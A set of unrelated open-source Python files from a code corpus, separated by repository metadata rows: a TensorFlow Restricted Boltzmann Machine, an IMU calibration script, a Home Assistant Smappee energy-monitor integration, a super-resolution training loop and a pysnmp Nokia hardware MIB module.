INPUT PARAMETER 12) verbose: evel of verbosity. optional, default 0(for Regularization)
INPUT PARAMETER 13) plot_training_loss: whether or not to plot training loss, default True
INPUT PARAMETER 14) visible_units_type: Binary or Gaussian (Default Binary)
"""
#Defining main paramters
self.num_visible = num_visible #1
self.num_hidden = num_hidden #2
self.main_dir = main_dir #3
self.model_name = model_name #4
self.gibbs_sampling_steps = gibbs_sampling_steps #5
self.learning_rate = learning_rate #6
self.momentum = momentum #7
self.l2 = l2 #8
self.batch_size = batch_size #9
self.num_epochs = num_epochs #10
self.stddev = stddev #11
self.verbose = verbose #12
self.plot_training_loss = plot_training_loss #13
self.visible_unit_type = visible_unit_type #14
self._create_model_directory()
self.model_path = os.path.join(self.main_dir, self.model_name)
self.W = None
self.bh_ = None
self.bv_ = None
self.dw = None
self.dbh_ = None
self.dbv_ = None
self.w_upd8 = None
self.bh_upd8 = None
self.bv_upd8 = None
self.encode = None
self.recontruct = None
self.loss_function = None
self.batch_cost = None
self.batch_free_energy = None
self.training_losses = []
self.input_data = None#_build_model
self.hrand = None # _build_model
self.validation_size = None #fit
self.tf_session = None #fit
self.tf_saver = None #_initialize_tf_utilities_and_ops
def sample_prob(self,probs,rand):
""" takes a tensor of probabilitiesas from a sigmoidal activation and sample from all
the distributions.
probs INPUT parameter: tensor of probabilities
rand INPUT parameter :tensor (of same shape as probabilities) of random values
:RETURN binary sample of probabilities
"""
return tf.nn.relu(tf.sign(probs-rand))
def gen_batches(self,data,batch_size):
""" Divide input data into batches
data INPUT parameter: input data( like a data frame)
batch_size INPUT parameter: desired size of each batch
:RETURN data divided in batches
"""
data = np.array(data)
for i in range(0,data.shape[0],batch_size):
yield data[i:i+batch_size]
def fit(self,train_set,validation_set = None,restore_previous_model=False):
""""
fit the model to the training data
INPUT PARAMETER train_set: training set
INPUT PARAMETER validation set.default None (Hence Optional)
INPUT PARAMETER restore_previous_model:
if true, a previous trained model
with the same name of this model is restored from disk to continue training.
OUTPUT: self
"""
if validation_set is not None:
self.validation_size = validation_set.shape[0]
tf.reset_default_graph()
self._build_model()# you will come across it later on
with tf.Session() as self.tf_session:
self._initialize_tf_utilities_and_ops(restore_previous_model)
self._train_model(train_set, validation_set)
self.tf_saver.save(self.tf_session, self.model_path)
if self.plot_training_loss:
#plot editing should be done here as you wish
plt.plot(self.training_losses)
plt.title("Training batch losses v.s. iteractions")
plt.xlabel("Num of training iteractions")
plt.ylabel("Reconstruction error")
plt.show()
def _initialize_tf_utilities_and_ops(self, restore_previous_model):
""""
Initialize TensorFlow operations: summaries, init operations, saver, summary_writer.
Restore a previously trained model if the flag restore_previous_model is true.
"""
init_op = tf.global_variables_initializer()
self.tf_saver = tf.train.Saver()
self.tf_session.run(init_op)
if restore_previous_model:
self.tf_saver.restore(self.tf_session, self.model_path)
def _train_model(self, train_set, validation_set):
"""" Train the Model
INPUT PARAMETER train set: Training set
INPUT PARAMETER validation_set: Validation set
OUTPUT self
"""
for i in range(self.num_epochs):
self._run_train_step(train_set)
if validation_set is not None:
self._run_validation_error(i, validation_set)
def _run_train_step(self,train_set):
""""
Run a training step. A training step is made by randomly shuffling the training set,
divide into batches and run the variable update nodes for each batch. If self.plot_training_loss
is true, will record training loss after each batch.
INPUT PARAMETER train_set: training set
OUTPUT self
"""
np.random.shuffle(train_set)
batches = [_ for _ in self.gen_batches(train_set, self.batch_size)]
updates = [self.w_upd8, self.bh_upd8, self.bv_upd8]
for batch in batches:
if self.plot_training_loss:
_,loss = self.tf_session.run([updates,self.loss_function],feed_dict = self._create_feed_dict(batch))
self.training_losses.append(loss)
else:
self.tf_session.run(updates, feed_dict=self._create_feed_dict(batch))
def _run_validation_error(self, epoch, validation_set):
"""
Run the error computation on the validation set and print it out for each epoch.
INPUT PARAMETER: current epoch
INPUT PARAMETER validation_set: validation data
OUTPUT: self
"""
loss = self.tf_session.run(self.loss_function,
feed_dict=self._create_feed_dict(validation_set))
if self.verbose == 1:
tqdm.write("Validation cost at step %s: %s" % (epoch, loss))
def _create_feed_dict(self, data):
""" Create the dictionary of data to feed to TensorFlow's session during training.
:param data: training/validation set batch
:return: dictionary(self.input_data: data, self.hrand: random_uniform)
"""
return {
self.input_data: data,
self.hrand: np.random.rand(data.shape[0], self.num_hidden),
}
def _build_model(self):
"""
BUilding the Restriced Boltzman Machine in Tensorflow
"""
self.input_data, self.hrand = self._create_placeholders() #check the function below
self.W, self.bh_, self.bv_, self.dw, self.dbh_, self.dbv_ = self._create_variables()#check the function below
hprobs0, hstates0, vprobs, hprobs1, hstates1 = self.gibbs_sampling_step(self.input_data)
positive = self.compute_positive_association(self.input_data, hprobs0, hstates0)
nn_input = vprobs
for step in range(self.gibbs_sampling_steps - 1):
hprobs, hstates, vprobs, hprobs1, hstates1 = self.gibbs_sampling_step(nn_input)
nn_input = vprobs
self.reconstruct = vprobs
negative = tf.matmul(tf.transpose(vprobs), hprobs1)
self.encode = hprobs1
#exact formula in my paper
dw = positive - negative
self.dw = self.momentum*self.dw + (1-self.momentum)*dw
self.w_upd8 = self.W.assign_add(self.learning_rate*self.dw - self.learning_rate*self.l2*self.W)
dbh_ = tf.reduce_mean(hprobs0 - hprobs1, 0)
self.dbh_ = self.momentum*self.dbh_ + self.learning_rate*dbh_
self.bh_upd8 = self.bh_.assign_add(self.dbh_)
dbv_ = tf.reduce_mean(self.input_data - vprobs, 0)
self.dbv_ = self.momentum*self.dbv_ + self.learning_rate*dbv_
self.bv_upd8 = self.bv_.assign_add(self.dbv_)
self.loss_function = tf.sqrt(tf.reduce_mean(tf.square(self.input_data - vprobs)))
self.batch_cost = tf.sqrt(tf.reduce_mean(tf.square(self.input_data - vprobs), 1))
self._create_free_energy_for_batch()
def _create_free_energy_for_batch(self):
""" Create free energy ops to batch input data
:return: self
"""
if self.visible_unit_type == 'bin':
self._create_free_energy_for_bin()
elif self.visible_unit_type == 'gauss':
self._create_free_energy_for_gauss()
else:
self.batch_free_energy = None
def _create_free_energy_for_bin(self):
""" Create free energy for mdoel with Bin visible layer
:return: self
"""
#Refer to the Binary Free Energy Equation
self.batch_free_energy = - (tf.matmul(self.input_data, tf.reshape(self.bv_, [-1, 1])) + tf.reshape(tf.reduce_sum(tf.log(tf.exp(tf.matmul(self.input_data, self.W) + self.bh_) + 1), 1), [-1, 1]))
def _create_free_energy_for_gauss(self):
""" Create free energy for model with Gauss visible layer
:return: self
"""
#Refer to the Gaussian Free Energy Equation
self.batch_free_energy = - (tf.matmul(self.input_data, tf.reshape(self.bv_, [-1, 1])) - tf.reshape(tf.reduce_sum(0.5 * self.input_data * self.input_data, 1), [-1, 1]) + tf.reshape(tf.reduce_sum(tf.log(tf.exp(tf.matmul(self.input_data, self.W) + self.bh_) + 1), 1), [-1, 1]))
def _create_placeholders(self):
""" Create the TensorFlow placeholders for the model.
:return: tuple(input(shape(None, num_visible)),
hrand(shape(None, num_hidden)))
"""
x = tf.placeholder('float', [None, self.num_visible], name='x-input')
hrand = tf.placeholder('float', [None, self.num_hidden], name='hrand')
return x, hrand
def _create_variables(self):
""" Create the TensorFlow variables for the model.
:return: tuple(weights(shape(num_visible, num_hidden),
hidden bias(shape(num_hidden)),
visible bias(shape(num_visible)))
"""
W = tf.Variable(tf.random_normal((self.num_visible, self.num_hidden), mean=0.0, stddev=0.01), name='weights')
dw = tf.Variable(tf.zeros([self.num_visible, self.num_hidden]), name = 'derivative-weights')
bh_ = tf.Variable(tf.zeros([self.num_hidden]), name='hidden-bias')
dbh_ = tf.Variable(tf.zeros([self.num_hidden]), name='derivative-hidden-bias')
bv_ = tf.Variable(tf.zeros([self.num_visible]), name='visible-bias')
dbv_ = tf.Variable(tf.zeros([self.num_visible]), name='derivative-visible-bias')
return W, bh_, bv_, dw, dbh_, dbv_
def gibbs_sampling_step(self, visible):
""" Performs one step of gibbs sampling.
:param visible: activations of the visible units
:return: tuple(hidden probs, hidden states, visible probs,
new hidden probs, new hidden states)
"""
hprobs, hstates = self.sample_hidden_from_visible(visible)
vprobs = self.sample_visible_from_hidden(hprobs)
hprobs1, hstates1 = self.sample_hidden_from_visible(vprobs)
return hprobs, hstates, vprobs, hprobs1, hstates1
def sample_hidden_from_visible(self, visible):
""" Sample the hidden units from the visible units.
This is the Positive phase of the Contrastive Divergence algorithm.
:param visible: activations of the visible units
:return: tuple(hidden probabilities, hidden binary states)
"""
hprobs = tf.nn.sigmoid(tf.matmul(visible, self.W) + self.bh_)
hstates = self.sample_prob(hprobs, self.hrand)
return hprobs, hstates
def sample_visible_from_hidden(self, hidden):
""" Sample the visible units from the hidden units.
This is the Negative phase of the Contrastive Divergence algorithm.
:param hidden: activations of the hidden units
:return: visible probabilities
"""
visible_activation = tf.matmul(hidden, tf.transpose(self.W)) + self.bv_
if self.visible_unit_type == 'bin':
vprobs = tf.nn.sigmoid(visible_activation)
elif self.visible_unit_type == 'gauss':
vprobs = tf.truncated_normal((1, self.num_visible), mean=visible_activation, stddev=self.stddev)
else:
vprobs = None
return vprobs
def compute_positive_association(self, visible, hidden_probs, hidden_states):
""" Compute positive associations between visible and hidden units.
:param visible: visible units
:param hidden_probs: hidden units probabilities
:param hidden_states: hidden units states
:return: positive association = dot(visible.T, hidden)
"""
if self.visible_unit_type == 'bin':
positive = tf.matmul(tf.transpose(visible), hidden_states)
elif self.visible_unit_type == 'gauss':
positive = tf.matmul(tf.transpose(visible), hidden_probs)
else:
positive = None
return positive
def _create_model_directory(self):
""" Create the directory for storing the model
:return: self
"""
if not os.path.isdir(self.main_dir):
print("Created dir: ", self.main_dir)
os.mkdir(self.main_dir)
def getRecontructError(self, data):
""" return Reconstruction Error (loss) from data in batch.
:param data: input data of shape num_samples x visible_size
:return: Reconstruction cost for each sample in the batch
"""
with tf.Session() as self.tf_session:
self.tf_saver.restore(self.tf_session, self.model_path)
batch_loss = self.tf_session.run(self.batch_cost,
feed_dict=self._create_feed_dict(data))
return batch_loss
def getFreeEnergy(self, data):
""" return Free Energy from data.
:param data: input data of shape num_samples x visible_size
:return: Free Energy for each sample: p(x)
"""
with tf.Session() as self.tf_session:
self.tf_saver.restore(self.tf_session, self.model_path)
batch_FE = self.tf_session.run(self.batch_free_energy,
feed_dict=self._create_feed_dict(data))
return batch_FE
def getRecontruction(self, data):
with tf.Session() as self.tf_session:
self.tf_saver.restore(self.tf_session, self.model_path)
batch_reconstruct = self.tf_session.run(self.recontruct,
feed_dict=self._create_feed_dict(data))
return batch_reconstruct
def load_model(self, shape, gibbs_sampling_steps, model_path):
""" Load a trained model from disk. The shape of the model
(num_visible, num_hidden) and the number of gibbs sampling steps
must be known in order to restore the model.
:param shape: tuple(num_visible, num_hidden)
:param gibbs_sampling_steps:
:param model_path:
:return: self
"""
self.num_visible, self.num_hidden = shape[0], shape[1]
self.gibbs_sampling_steps = gibbs_sampling_steps
tf.reset_default_graph()
self._build_model()
init_op = tf.global_variables_initializer()
self.tf_saver = tf.train.Saver()
with tf.Session() as self.tf_session:
self.tf_session.run(init_op)
self.tf_saver.restore(self.tf_session, model_path)
def get_model_parameters(self):
""" Return the model parameters in the form of numpy arrays.
:return: model parameters
"""
with tf.Session() as self.tf_session:
self.tf_saver.restore(self.tf_session, self.model_path)
return {
'W': self.W.eval(),
'bh_': self.bh_.eval(),
'bv_': self.bv_.eval()
}
#The MIT License (MIT)
#Copyright (c) 2016 Gabriele Angeletti
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
#© 2019 GitHub, Inc.
| 38.474849 | 354 | 0.633459 | [
"MIT"
] | Phoebe0222/MLSA-workshops-2019-student | Unsupervised-Learning/rbm.py | 19,123 | Python |
from data_processing_calibration import DataProcessingCalibration
if __name__ == "__main__":
# Start processing
dp_ST = DataProcessingCalibration()
print("Initialize is successful.")
# Open .csv file with data
data_from_sensor = dp_ST.openFile('C://static_test.csv')
print("Data was got.")
# Filter and processing, and convert data in Euler angles
data_orientation_ST = dp_ST.processFile(data_from_sensor)
print("Data was converted.")
# Use method of Allan Variation for data
tau_roll, ad_roll, tau_pitch, ad_pitch, tau_yaw, ad_yaw = dp_ST.deviationAllan(data_orientation_ST, rate=31)
print("Using method of Allan Variation was successful.")
# Create plots
dp_ST.plotDataFromFile(data_orientation_ST, tau_roll, ad_roll, tau_pitch, ad_pitch, tau_yaw, ad_yaw)
print("Plots creating was successful.")
| 36.958333 | 113 | 0.722661 | [
"MIT"
] | DefenderOfSockets/Calibration_IMU_MPU6050 | static_test/main.py | 887 | Python |
"""
Support for Smappee energy monitor.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/smappee/
"""
import logging
from datetime import datetime, timedelta
import re
import voluptuous as vol
from requests.exceptions import RequestException
from homeassistant.const import (
CONF_USERNAME, CONF_PASSWORD, CONF_HOST
)
from homeassistant.util import Throttle
from homeassistant.helpers.discovery import load_platform
import homeassistant.helpers.config_validation as cv
REQUIREMENTS = ['smappy==0.2.16']
_LOGGER = logging.getLogger(__name__)
DEFAULT_NAME = 'Smappee'
DEFAULT_HOST_PASSWORD = 'admin'
CONF_CLIENT_ID = 'client_id'
CONF_CLIENT_SECRET = 'client_secret'
CONF_HOST_PASSWORD = 'host_password'
DOMAIN = 'smappee'
DATA_SMAPPEE = 'SMAPPEE'
_SENSOR_REGEX = re.compile(
r'(?P<key>([A-Za-z]+))\=' +
r'(?P<value>([0-9\.]+))')
CONFIG_SCHEMA = vol.Schema({
DOMAIN: vol.Schema({
vol.Inclusive(CONF_CLIENT_ID, 'Server credentials'): cv.string,
vol.Inclusive(CONF_CLIENT_SECRET, 'Server credentials'): cv.string,
vol.Inclusive(CONF_USERNAME, 'Server credentials'): cv.string,
vol.Inclusive(CONF_PASSWORD, 'Server credentials'): cv.string,
vol.Optional(CONF_HOST): cv.string,
vol.Optional(CONF_HOST_PASSWORD, default=DEFAULT_HOST_PASSWORD):
cv.string
}),
}, extra=vol.ALLOW_EXTRA)
MIN_TIME_BETWEEN_UPDATES = timedelta(seconds=30)
def setup(hass, config):
"""Set up the Smapee component."""
client_id = config.get(DOMAIN).get(CONF_CLIENT_ID)
client_secret = config.get(DOMAIN).get(CONF_CLIENT_SECRET)
username = config.get(DOMAIN).get(CONF_USERNAME)
password = config.get(DOMAIN).get(CONF_PASSWORD)
host = config.get(DOMAIN).get(CONF_HOST)
host_password = config.get(DOMAIN).get(CONF_HOST_PASSWORD)
smappee = Smappee(client_id, client_secret, username,
password, host, host_password)
if not smappee.is_local_active and not smappee.is_remote_active:
_LOGGER.error("Neither Smappee server or local component enabled.")
return False
hass.data[DATA_SMAPPEE] = smappee
load_platform(hass, 'switch', DOMAIN)
load_platform(hass, 'sensor', DOMAIN)
return True
class Smappee:
"""Stores data retrieved from Smappee sensor."""
def __init__(self, client_id, client_secret, username,
password, host, host_password):
"""Initialize the data."""
import smappy
self._remote_active = False
self._local_active = False
if client_id is not None:
try:
self._smappy = smappy.Smappee(client_id, client_secret)
self._smappy.authenticate(username, password)
self._remote_active = True
except RequestException as error:
self._smappy = None
_LOGGER.exception(
"Smappee server authentication failed (%s)",
error)
else:
_LOGGER.warning("Smappee server component init skipped.")
if host is not None:
try:
self._localsmappy = smappy.LocalSmappee(host)
self._localsmappy.logon(host_password)
self._local_active = True
except RequestException as error:
self._localsmappy = None
_LOGGER.exception(
"Local Smappee device authentication failed (%s)",
error)
else:
_LOGGER.warning("Smappee local component init skipped.")
self.locations = {}
self.info = {}
self.consumption = {}
self.sensor_consumption = {}
self.instantaneous = {}
if self._remote_active or self._local_active:
self.update()
@Throttle(MIN_TIME_BETWEEN_UPDATES)
def update(self):
"""Update data from Smappee API."""
if self.is_remote_active:
service_locations = self._smappy.get_service_locations() \
.get('serviceLocations')
for location in service_locations:
location_id = location.get('serviceLocationId')
if location_id is not None:
self.sensor_consumption[location_id] = {}
self.locations[location_id] = location.get('name')
self.info[location_id] = self._smappy \
.get_service_location_info(location_id)
_LOGGER.debug("Remote info %s %s",
self.locations, self.info[location_id])
for sensors in self.info[location_id].get('sensors'):
sensor_id = sensors.get('id')
self.sensor_consumption[location_id]\
.update({sensor_id: self.get_sensor_consumption(
location_id, sensor_id,
aggregation=3, delta=1440)})
_LOGGER.debug("Remote sensors %s %s",
self.locations,
self.sensor_consumption[location_id])
self.consumption[location_id] = self.get_consumption(
location_id, aggregation=3, delta=1440)
_LOGGER.debug("Remote consumption %s %s",
self.locations,
self.consumption[location_id])
if self.is_local_active:
self.local_devices = self.get_switches()
_LOGGER.debug("Local switches %s", self.local_devices)
self.instantaneous = self.load_instantaneous()
_LOGGER.debug("Local values %s", self.instantaneous)
@property
def is_remote_active(self):
"""Return true if Smappe server is configured and working."""
return self._remote_active
@property
def is_local_active(self):
"""Return true if Smappe local device is configured and working."""
return self._local_active
def get_switches(self):
"""Get switches from local Smappee."""
if not self.is_local_active:
return
try:
return self._localsmappy.load_command_control_config()
except RequestException as error:
_LOGGER.error(
"Error getting switches from local Smappee. (%s)",
error)
def get_consumption(self, location_id, aggregation, delta):
"""Update data from Smappee."""
# Start & End accept epoch (in milliseconds),
# datetime and pandas timestamps
# Aggregation:
# 1 = 5 min values (only available for the last 14 days),
# 2 = hourly values,
# 3 = daily values,
# 4 = monthly values,
# 5 = quarterly values
if not self.is_remote_active:
return
end = datetime.utcnow()
start = end - timedelta(minutes=delta)
try:
return self._smappy.get_consumption(location_id,
start,
end,
aggregation)
except RequestException as error:
_LOGGER.error(
"Error getting comsumption from Smappee cloud. (%s)",
error)
def get_sensor_consumption(self, location_id, sensor_id,
aggregation, delta):
"""Update data from Smappee."""
# Start & End accept epoch (in milliseconds),
# datetime and pandas timestamps
# Aggregation:
# 1 = 5 min values (only available for the last 14 days),
# 2 = hourly values,
# 3 = daily values,
# 4 = monthly values,
# 5 = quarterly values
if not self.is_remote_active:
return
end = datetime.utcnow()
start = end - timedelta(minutes=delta)
try:
return self._smappy.get_sensor_consumption(location_id,
sensor_id,
start,
end, aggregation)
except RequestException as error:
_LOGGER.error(
"Error getting comsumption from Smappee cloud. (%s)",
error)
def actuator_on(self, location_id, actuator_id,
is_remote_switch, duration=None):
"""Turn on actuator."""
# Duration = 300,900,1800,3600
# or any other value for an undetermined period of time.
#
# The comport plugs have a tendency to ignore the on/off signal.
# And because you can't read the status of a plug, it's more
# reliable to execute the command twice.
try:
if is_remote_switch:
self._smappy.actuator_on(location_id, actuator_id, duration)
self._smappy.actuator_on(location_id, actuator_id, duration)
else:
self._localsmappy.on_command_control(actuator_id)
self._localsmappy.on_command_control(actuator_id)
except RequestException as error:
_LOGGER.error(
"Error turning actuator on. (%s)",
error)
return False
return True
def actuator_off(self, location_id, actuator_id,
is_remote_switch, duration=None):
"""Turn off actuator."""
# Duration = 300,900,1800,3600
# or any other value for an undetermined period of time.
#
# The comport plugs have a tendency to ignore the on/off signal.
# And because you can't read the status of a plug, it's more
# reliable to execute the command twice.
try:
if is_remote_switch:
self._smappy.actuator_off(location_id, actuator_id, duration)
self._smappy.actuator_off(location_id, actuator_id, duration)
else:
self._localsmappy.off_command_control(actuator_id)
self._localsmappy.off_command_control(actuator_id)
except RequestException as error:
_LOGGER.error(
"Error turning actuator on. (%s)",
error)
return False
return True
def active_power(self):
"""Get sum of all instantaneous active power values from local hub."""
if not self.is_local_active:
return
try:
return self._localsmappy.active_power()
except RequestException as error:
_LOGGER.error(
"Error getting data from Local Smappee unit. (%s)",
error)
def active_cosfi(self):
"""Get the average of all instantaneous cosfi values."""
if not self.is_local_active:
return
try:
return self._localsmappy.active_cosfi()
except RequestException as error:
_LOGGER.error(
"Error getting data from Local Smappee unit. (%s)",
error)
def instantaneous_values(self):
"""ReportInstantaneousValues."""
if not self.is_local_active:
return
report_instantaneous_values = \
self._localsmappy.report_instantaneous_values()
report_result = \
report_instantaneous_values['report'].split('<BR>')
properties = {}
for lines in report_result:
lines_result = lines.split(',')
for prop in lines_result:
match = _SENSOR_REGEX.search(prop)
if match:
properties[match.group('key')] = \
match.group('value')
_LOGGER.debug(properties)
return properties
def active_current(self):
"""Get current active Amps."""
if not self.is_local_active:
return
properties = self.instantaneous_values()
return float(properties['current'])
def active_voltage(self):
"""Get current active Voltage."""
if not self.is_local_active:
return
properties = self.instantaneous_values()
return float(properties['voltage'])
def load_instantaneous(self):
"""LoadInstantaneous."""
if not self.is_local_active:
return
try:
return self._localsmappy.load_instantaneous()
except RequestException as error:
_LOGGER.error(
"Error getting data from Local Smappee unit. (%s)",
error)
| 36.276353 | 78 | 0.581089 | [
"Apache-2.0"
] | Arshrock/home-assistant | homeassistant/components/smappee.py | 12,733 | Python |
import os
import math
from decimal import Decimal
import utility
import torch
import torch.nn.utils as utils
from tqdm import tqdm
class Trainer():
def __init__(self, args, loader, my_model, my_loss, ckp):
self.args = args
self.scale = args.scale
self.ckp = ckp
self.loader_train = loader.loader_train
self.loader_test = loader.loader_test
self.model = my_model
self.loss = my_loss
self.optimizer = utility.make_optimizer(args, self.model)
self.flag_ae_loss = True if args.loss.lower().find('ae') >= 0 else False
if self.args.precision == 'amp':
self.scaler = torch.cuda.amp.GradScaler()
if self.args.load != '':
# To avoid "UserWarning: Detected call of `lr_scheduler.step()` before `optimizer.step()`."
# The 0 gradient value will not update any parameter of the model to train.
self.optimizer.zero_grad()
self.optimizer.step()
self.optimizer.load(ckp.dir, epoch=len(ckp.log))
self.error_last = 1e8
def train(self):
self.loss.step()
epoch = self.optimizer.get_last_epoch() + 1
lr = self.optimizer.get_lr()
self.ckp.write_log(
'[Epoch {}]\tLearning rate: {:.2e}'.format(epoch, Decimal(lr))
)
self.loss.start_log()
self.model.train()
timer_data, timer_model = utility.timer(), utility.timer()
# TEMP
self.loader_train.dataset.set_scale(0)
for batch, (lr, hr, _,) in enumerate(self.loader_train):
lr, hr = self.prepare(lr, hr)
if self.flag_ae_loss:
hr, hr_ae = hr[:,:self.args.n_colors, ...], hr[:,self.args.n_colors:,...]
else:
hr_ae = None
timer_data.hold()
timer_model.tic()
self.optimizer.zero_grad()
if self.args.precision == 'amp':
with torch.cuda.amp.autocast():
sr = self.model(lr, 0)
if self.flag_ae_loss:
sr_ae = self._forward_auto_encoder(hr_ae, 0)
else:
sr_ae = None
loss = self.loss(sr, hr, sr_ae, hr_ae)
self.scaler.scale(loss).backward()
else:
sr = self.model(lr, 0)
if self.flag_ae_loss:
sr_ae = self._forward_auto_encoder(hr_ae, 0)
else:
sr_ae = None
loss = self.loss(sr, hr, sr_ae, hr_ae)
loss.backward()
if self.args.gclip > 0:
utils.clip_grad_value_(
self.model.parameters(),
self.args.gclip
)
if self.args.precision == 'amp':
self.scaler.step(self.optimizer)
self.scaler.update()
else:
self.optimizer.step()
timer_model.hold()
if (batch + 1) % self.args.print_every == 0:
self.ckp.write_log('[{}/{}]\t{}\t{:.1f}+{:.1f}s'.format(
(batch + 1) * self.args.batch_size,
len(self.loader_train.dataset),
self.loss.display_loss(batch),
timer_model.release(),
timer_data.release()))
timer_data.tic()
self.loss.end_log(len(self.loader_train))
self.error_last = self.loss.log[-1, -1]
self.optimizer.schedule()
def test(self):
torch.set_grad_enabled(False)
epoch = self.optimizer.get_last_epoch()
self.ckp.write_log('\nEvaluation:')
self.ckp.add_log(
torch.zeros(1, len(self.loader_test), len(self.scale))
)
self.model.eval()
timer_test = utility.timer()
if self.args.save_results: self.ckp.begin_background()
for idx_data, d in enumerate(self.loader_test):
for idx_scale, scale in enumerate(self.scale):
d.dataset.set_scale(idx_scale)
for lr, hr, filename in tqdm(d, ncols=80):
lr, hr = self.prepare(lr, hr)
sr = self.model(lr, idx_scale)
sr = utility.quantize(sr, self.args.rgb_range)
save_list = [sr]
self.ckp.log[-1, idx_data, idx_scale] += utility.calc_psnr(
sr, hr, scale, self.args.rgb_range, dataset=d
)
if self.args.save_gt:
save_list.extend([lr, hr])
if self.args.save_results:
self.ckp.save_results(d, filename[0], save_list, scale)
self.ckp.log[-1, idx_data, idx_scale] /= len(d)
best = self.ckp.log.max(0)
self.ckp.write_log(
'[{} x{}]\tPSNR: {:.3f} (Best: {:.3f} @epoch {})'.format(
d.dataset.name,
scale,
self.ckp.log[-1, idx_data, idx_scale],
best[0][idx_data, idx_scale],
best[1][idx_data, idx_scale] + 1
)
)
self.ckp.write_log('Forward: {:.2f}s\n'.format(timer_test.toc()))
self.ckp.write_log('Saving...')
if self.args.save_results:
self.ckp.end_background()
if not self.args.test_only:
self.ckp.save(self, epoch, is_best=(best[1][0, 0] + 1 == epoch))
self.ckp.write_log(
'Total: {:.2f}s\n'.format(timer_test.toc()), refresh=True
)
torch.set_grad_enabled(True)
def prepare(self, *args):
device = torch.device('cpu' if self.args.cpu else 'cuda')
def _prepare(tensor):
if self.args.precision == 'half': tensor = tensor.half()
return tensor.to(device)
return [_prepare(a) for a in args]
def terminate(self):
if self.args.test_only:
self.test()
return True
else:
epoch = self.optimizer.get_last_epoch() + 1
return epoch > self.args.epochs
# return epoch >= self.args.epochs
def _forward_auto_encoder(self, x, idx_scale):
self.model.set_forward_ae_loss(True)
x = self.model(x, idx_scale)
self.model.set_forward_ae_loss(False)
return x | 34.645503 | 105 | 0.51069 | [
"MIT"
] | CvlabAssignment/WRcan | src/trainer.py | 6,548 | Python |
#
# PySNMP MIB module NOKIA-HWM-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/NOKIA-HWM-MIB
# Produced by pysmi-0.3.4 at Wed May 1 14:23:29 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueSizeConstraint, ConstraintsUnion, ConstraintsIntersection, SingleValueConstraint, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "ConstraintsUnion", "ConstraintsIntersection", "SingleValueConstraint", "ValueRangeConstraint")
entPhysicalIndex, = mibBuilder.importSymbols("ENTITY-MIB", "entPhysicalIndex")
ntcHWMibs, ntcHWReqs, ntcCommonModules = mibBuilder.importSymbols("NOKIA-COMMON-MIB-OID-REGISTRATION-MIB", "ntcHWMibs", "ntcHWReqs", "ntcCommonModules")
ModuleCompliance, ObjectGroup, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "ObjectGroup", "NotificationGroup")
ObjectIdentity, Counter64, MibScalar, MibTable, MibTableRow, MibTableColumn, Gauge32, Integer32, IpAddress, TimeTicks, ModuleIdentity, MibIdentifier, Unsigned32, Counter32, NotificationType, iso, Bits = mibBuilder.importSymbols("SNMPv2-SMI", "ObjectIdentity", "Counter64", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Gauge32", "Integer32", "IpAddress", "TimeTicks", "ModuleIdentity", "MibIdentifier", "Unsigned32", "Counter32", "NotificationType", "iso", "Bits")
AutonomousType, TextualConvention, TimeStamp, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "AutonomousType", "TextualConvention", "TimeStamp", "DisplayString")
ntcHWModule = ModuleIdentity((1, 3, 6, 1, 4, 1, 94, 1, 16, 5, 1))
ntcHWModule.setRevisions(('1998-08-24 00:00', '1998-09-03 00:00', '1998-09-24 00:00', '1998-10-04 00:00', '1999-01-08 00:00', '1999-08-05 00:00', '1999-10-25 00:00',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: ntcHWModule.setRevisionsDescriptions(('Rev 0.1 August 24, 1998 Initial version - ready for review', 'Rev 0.2 September 3, 1998 Initial review by Tero Soukko whose comments have been incorporated.', 'Rev 0.3 September 24, 1998 ready for initial review.', 'Rev 0.4 Updated anchors to use values registered by Mika Kiikkila.', 'Rev 1.0 Syntax of ntcHWLastChangedTime changed from DateAndTime to TimeStamp. Traps commented out because they are part of Nokia Common Alarm MIB.', 'Rev 1.01 Those IMPORTS which are not used are removed. Groups ntcHWSlots and ntcHWEventGroup which are not defined in this module are removed. The name NokiaHwmSlotEntry is changed to NtcHWSlotEntry on account of convenience. All notification definions before out-commented removed. Some esthetic modifications made.', "Comment 'The NMS is not allowed to set the value of ntcHWAdminstate to missing.' added to the ntcHWAdminstate's description.",))
if mibBuilder.loadTexts: ntcHWModule.setLastUpdated('9901080000Z')
if mibBuilder.loadTexts: ntcHWModule.setOrganization('Nokia')
if mibBuilder.loadTexts: ntcHWModule.setContactInfo('Anna-Kaisa Lindfors Nokia Telecommunications Oy Hiomotie 5, FIN-00380 Helsinki +358-9-51121 [email protected]')
if mibBuilder.loadTexts: ntcHWModule.setDescription('The MIB module that is used to control the Hardware Management information.')
